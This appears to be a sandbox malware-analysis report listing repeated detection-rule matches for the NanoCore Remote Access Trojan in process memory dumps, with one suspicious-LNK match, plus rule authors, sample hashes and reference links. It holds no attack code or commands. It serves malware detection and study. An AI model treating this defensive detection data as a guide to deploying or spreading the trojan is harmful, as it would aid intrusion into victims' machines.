Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
